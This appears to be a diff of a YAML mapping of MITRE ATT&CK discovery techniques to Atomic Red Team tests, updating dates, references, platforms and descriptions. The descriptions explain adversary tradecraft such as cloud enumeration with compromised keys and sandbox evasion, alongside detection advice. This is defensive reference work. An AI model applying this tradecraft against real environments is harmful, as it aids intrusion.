+      - 'Instance: Instance Enumeration'
+      - 'Cloud Storage: Cloud Storage Enumeration'
+      - 'Volume: Volume Enumeration'
+      - 'Snapshot: Snapshot Enumeration'
       type: attack-pattern
       id: attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d
       created: '2020-08-20T17:51:25.671Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1580
         url: https://attack.mitre.org/techniques/T1580
+        external_id: T1580
       - source_name: Expel IO Evil in AWS
-        url: https://expel.io/blog/finding-evil-in-aws/
         description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding
           Evil in AWS. Retrieved June 25, 2020.
+        url: https://expel.io/blog/finding-evil-in-aws/
       - source_name: AWS Head Bucket
-        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
         description: Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February
           14, 2022.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
       - source_name: AWS Get Public Access Block
-        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
         description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+        url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
       - source_name: AWS Describe DB Instances
-        url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
         description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+        url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
       - source_name: Amazon Describe Instance
-        url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
         description: Amazon. (n.d.). describe-instance-information. Retrieved March
           3, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
       - source_name: Amazon Describe Instances API
-        url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
         description: Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.
+        url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
       - source_name: Google Compute Instances
-        url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
         description: Google. (n.d.). gcloud compute instances list. Retrieved May
           26, 2020.
+        url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
       - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
         description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
           2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
       - source_name: Microsoft AZ CLI
-        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
         description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
       - source_name: Malwarebytes OSINT Leaky Buckets - Hioureas
-        url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
         description: 'Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating
           leaky buckets into your OSINT workflow. Retrieved February 14, 2022.'
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
-
-        Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a bucket’s existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command <code>az vm list</code> lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
-
-        An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Cloud Infrastructure Discovery
-      x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
-        components. Monitor logs for actions that could be taken to gather information
-        about cloud infrastructure, including the use of discovery API calls by new
-        or unexpected users and enumerations from unknown or malicious IP addresses.
-        To reduce false positives, valid change management procedures could introduce
-        a known identifier that is logged with the change (e.g., tag or header) if
-        supported by the cloud provider, to help distinguish valid, expected actions
-        from malicious ones.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: discovery
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Instance: Instance Enumeration'
-      - 'Cloud Storage: Cloud Storage Enumeration'
-      - 'Volume: Volume Enumeration'
-      - 'Snapshot: Snapshot Enumeration'
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1580
     atomic_tests:
     - name: AWS - EC2 Enumeration from Cloud Instance
@@ -55772,7 +56466,7 @@ discovery:
         elevation_required: false
   T1217:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-16T14:24:40.625Z'
       name: Browser Bookmark Discovery
       description: |-
         Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)
@@ -55826,7 +56520,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1217
     atomic_tests:
     - name: List Mozilla Firefox Bookmark Database Files on macOS
@@ -55918,7 +56611,7 @@ discovery:
       x_mitre_detection: |-
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
 
-        Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, (LinkById: T1059.008) commands may also be used to gather system and network information with built-in features native to the network device platform.  Monitor CLI activity for unexpected or unauthorized use  commands being run by non-standard users from non-standard locations.  Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+        Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, {{LinkById|T1059.008} commands may also be used to gather system and network information with built-in features native to the network device platform.  Monitor CLI activity for unexpected or unauthorized use  commands being run by non-standard users from non-standard locations.  Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
@@ -55956,7 +56649,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1016
     atomic_tests:
     - name: System Network Configuration Discovery
@@ -56008,7 +56700,7 @@ discovery:
         elevation_required: true
   T1087:
     technique:
-      modified: '2024-01-12T23:36:56.245Z'
+      modified: '2024-10-15T15:35:28.784Z'
       name: Account Discovery
       description: |-
         Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
@@ -56035,14 +56727,13 @@ discovery:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
@@ -56071,7 +56762,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1482:
     technique:
@@ -56131,7 +56821,7 @@ discovery:
         .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility
         [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries
         to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)'
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-06-16T19:18:22.305Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Domain Trust Discovery
       x_mitre_detection: |
@@ -56150,7 +56840,6 @@ discovery:
       - 'Process: OS API Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1482
     atomic_tests: []
   T1083:
@@ -56219,7 +56908,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1083
     atomic_tests:
     - name: Nix File and Directory Discovery
@@ -56278,7 +56966,7 @@ discovery:
         name: sh
   T1049:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-09-06T22:35:34.231Z'
       name: System Network Connections Discovery
       description: "Adversaries may attempt to get a listing of network connections
         to or from the compromised system they are currently accessing or from remote
@@ -56355,7 +57043,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1049
     atomic_tests:
     - name: System Network Connections Discovery FreeBSD, Linux & MacOS
@@ -56386,35 +57073,7 @@ discovery:
         name: sh
   T1497:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      - Sunny Neo
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
-      type: attack-pattern
-      created: '2019-04-17T22:22:24.505Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497
-        url: https://attack.mitre.org/techniques/T1497
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Unit 42 Pirpi July 2015
-        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
-        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
-          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
-          23, 2019.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.049Z'
       name: Virtualization/Sandbox Evasion
       description: |+
         Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -56426,6 +57085,10 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      - Sunny Neo
+      x_mitre_deprecated: false
       x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
         techniques will likely occur in the first steps of an operation but may also
         occur throughout as an adversary learns the environment. Data and events should
@@ -56436,8 +57099,14 @@ discovery:
         required. Monitoring for suspicious processes being spawned that gather a
         variety of system information or perform other forms of Discovery, especially
         in a short period of time, may aid in detection.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
       x_mitre_version: '1.3'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -56447,9 +57116,28 @@ discovery:
       - Host forensic analysis
       - Signature-based detection
       - Static File Analysis
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+      created: '2019-04-17T22:22:24.505Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497
+        external_id: T1497
+      - source_name: Unit 42 Pirpi July 2015
+        description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+          on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+          23, 2019.'
+        url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1619:
     technique:
@@ -56482,7 +57170,7 @@ discovery:
         Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage.  Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.
 
         Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-11T22:29:43.677Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Cloud Storage Object Discovery
       x_mitre_detection: "System and network discovery techniques normally occur throughout
@@ -56500,12 +57188,11 @@ discovery:
       - 'Cloud Storage: Cloud Storage Enumeration'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1619
     atomic_tests: []
   T1654:
     technique:
-      modified: '2023-09-30T22:18:46.711Z'
+      modified: '2024-10-15T12:24:40.892Z'
       name: Log Enumeration
       description: |-
         Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).
@@ -56513,11 +57200,14 @@ discovery:
         Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)
 
         Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.
+
+        In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures. This may allow them to adjust their techniques in order to maintain persistence or evade defenses.(Citation: Permiso GUI-Vil 2023)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
       x_mitre_contributors:
       - Bilal Bahadır Yenici
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -56528,7 +57218,7 @@ discovery:
       - macOS
       - Windows
       - IaaS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
@@ -56542,6 +57232,10 @@ discovery:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1654
         external_id: T1654
+      - source_name: Permiso GUI-Vil 2023
+        description: 'Ian Ahl. (2023, May 22). Unmasking GUI-Vil: Financially Motivated
+          Cloud Threat Actor. Retrieved August 30, 2024.'
+        url: https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor/
       - source_name: SIM Swapping and Abuse of the Microsoft Azure Serial Console
         description: 'Mandiant Intelligence. (2023, May 16). SIM Swapping and Abuse
           of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced
@@ -56561,56 +57255,11 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1654
     atomic_tests: []
   T1087.004:
     technique:
-      x_mitre_platforms:
-      - Azure AD
-      - Office 365
-      - SaaS
-      - IaaS
-      - Google Workspace
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
-      type: attack-pattern
-      created: '2020-02-21T21:08:36.570Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1087.004
-        url: https://attack.mitre.org/techniques/T1087/004
-      - description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
-        url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
-        source_name: Microsoft msolrolemember
-      - description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
-          6, 2019.
-        url: https://github.com/True-Demon/raindance
-        source_name: GitHub Raindance
-      - description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
-        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
-        source_name: Microsoft AZ CLI
-      - description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
-          Directory Leaks via Azure. Retrieved October 6, 2019.
-        url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
-        source_name: Black Hills Red Teaming MS AD Azure, 2018
-      - source_name: AWS List Roles
-        description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
-        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
-      - source_name: AWS List Users
-        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
-        description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
-      - source_name: Google Cloud - IAM Servie Accounts List API
-        url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
-        description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
-          August 4, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:51:18.808Z'
       name: Cloud Account
       description: "Adversaries may attempt to get a listing of cloud accounts. Cloud
         accounts are those created and configured by an organization for use by users,
@@ -56632,19 +57281,61 @@ discovery:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
 
         System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - SaaS
+      - IaaS
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
+      created: '2020-02-21T21:08:36.570Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1087/004
+        external_id: T1087.004
+      - source_name: AWS List Roles
+        description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
+      - source_name: AWS List Users
+        description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
+        url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
+      - source_name: Black Hills Red Teaming MS AD Azure, 2018
+        description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
+          Directory Leaks via Azure. Retrieved October 6, 2019.
+        url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
+      - source_name: Google Cloud - IAM Servie Accounts List API
+        description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
+          August 4, 2020.
+        url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
+      - source_name: Microsoft AZ CLI
+        description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
+      - source_name: Microsoft msolrolemember
+        description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
+        url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
+      - source_name: GitHub Raindance
+        description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
+          6, 2019.
+        url: https://github.com/True-Demon/raindance
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1057:
     technique:
@@ -56715,7 +57406,6 @@ discovery:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1057
     atomic_tests:
     - name: Process Discovery - ps
@@ -56742,41 +57432,7 @@ discovery:
         name: sh
   T1497.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
-      type: attack-pattern
-      created: '2020-03-06T21:04:12.454Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.002
-        url: https://attack.mitre.org/techniques/T1497/002
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Sans Virtual Jan 2016
-        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
-        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
-          Evasion Techniques. Retrieved April 17, 2019.
-      - source_name: Unit 42 Sofacy Nov 2018
-        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
-        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
-          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
-        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
-          LNK. Retrieved April 24, 2017.
-        source_name: FireEye FIN7 April 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.050Z'
       name: User Activity Based Checks
       description: "Adversaries may employ various user activity checks to detect
         and avoid virtualization and analysis environments. This may include changing
@@ -56800,6 +57456,9 @@ discovery:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'User activity-based checks will likely occur in the first
         steps of an operation but may also occur throughout as an adversary learns
         the environment. Data and events should not be viewed in isolation, but as
@@ -56810,9 +57469,14 @@ discovery:
         processes being spawned that gather a variety of system information or perform
         other forms of Discovery, especially in a short period of time, may aid in
         detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -56822,12 +57486,39 @@ discovery:
       - Static File Analysis
       - Signature-based detection
       - Host forensic analysis
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+      created: '2020-03-06T21:04:12.454Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/002
+        external_id: T1497.002
+      - source_name: FireEye FIN7 April 2017
+        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+          LNK. Retrieved April 24, 2017.
+        url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+      - source_name: Unit 42 Sofacy Nov 2018
+        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+      - source_name: Sans Virtual Jan 2016
+        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+          Evasion Techniques. Retrieved April 17, 2019.
